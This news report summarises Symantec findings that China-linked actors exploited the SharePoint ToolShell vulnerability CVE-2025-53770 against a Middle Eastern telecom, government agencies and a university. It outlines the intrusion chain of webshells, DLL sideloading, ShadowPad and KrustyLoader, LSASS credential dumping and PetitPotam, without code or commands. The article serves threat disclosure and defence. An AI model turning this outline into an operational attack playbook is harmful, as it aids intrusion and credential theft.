China-based threat actors exploited ToolShell SharePoint flaw CVE-2025-53770 soon after its July patch.
China-linked threat actors exploited the ToolShell SharePoint flaw vulnerability, tracked as CVE-2025-53770, to breach a telecommunications company in the Middle East after it was addressed by Microsoft in July 2025.
“China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025.” reads the report published by Broadcom’s Symantec Threat Hunter Team.
According to Broadcom’s Symantec Threat Hunter Team, the attackers, linked to Glowworm (aka Earth Estries) and UNC5221, breached multiple targets, including two African government departments, two South American agencies, and a U.S. university. The hackers used tools like Zingdoor and KrustyLoader, and targeted SQL and Apache ColdFusion servers. A fake “mantec.exe” (masquerading as Symantec software) sideloaded malware. Additional victims include a state tech agency in Africa, a Middle Eastern ministry, and a European finance firm.
In July, Microsoft warned of a SharePoint zero-day vulnerability, tracked as CVE-2025-53770 (CVSS score of 9.8), which is under active exploitation. The vulnerability is a deserialization of untrusted data in on-premises Microsoft SharePoint Server, an unauthorized attacker could exploit the vulnerability to execute code over a network.
Microsoft later confirmed that three China-based groups, Budworm, Violet Typhoon aka (Sheathminer), and Storm-2603, had exploited ToolShell, with the latter deploying Warlock ransomware.
Also targeted were government departments in an African country, as well as government agencies in South America, a university in the U.S., as well as likely a state technology agency in an African country, a government department in the Middle East, and a finance company in a European country.
According to Broadcom’s Symantec Threat Hunter Team, the attacks involved the exploitation of CVE-2025-53770, a now-patched security flaw in on-premise SharePoint servers that could be used to bypass authentication and achieve remote code execution.
Malicious activity at a Middle Eastern telecom began on July 21, 2025, two days after ToolShell was patched, with attackers using a webshell and DLL sideloading to deploy backdoors and loaders. Zingdoor was sideloaded via a Trend Micro binary to collect data, transfer files and run commands. Threat actors sideloaded the ShadowPad backdoor using a BitDefender binary; it supports plug-in updates and has been used alongside ransomware. On July 25, attackers dropped the Rust-based KrustyLoader to fetch second-stage payloads, evade analysis and self-delete. Attackers also employed a variety of publicly available and living-off-the-land tools, including Certutil for file downloads, GoGo Scanner for network scanning, Revsocks for proxying traffic through firewalls, and Sysinternals’ Procdump, PowerSploit’s Minidump, and LsassDumper to extract LSASS process memory and steal credentials.
“An exploit for the Windows LSA Spoofing Vulnerability, CVE-2021-36942 (aka PetitPotam), was also executed.” continues the post. “PetitPotam is an exploitation technique that allows for a threat actor within a compromised network to steal credentials and authentication information from Windows Servers such as a Domain Controller to gain full control of the domain. This is likely used for lateral movement or privilege escalation.”
The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.
The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.
“There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors.” concludes the report. “The large number of apparent victims of this activity is also notable. This may indicate that the attackers were carrying out an element of mass scanning for the ToolShell vulnerability, before then carrying out further activity only on networks of interest.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, ToolShell)
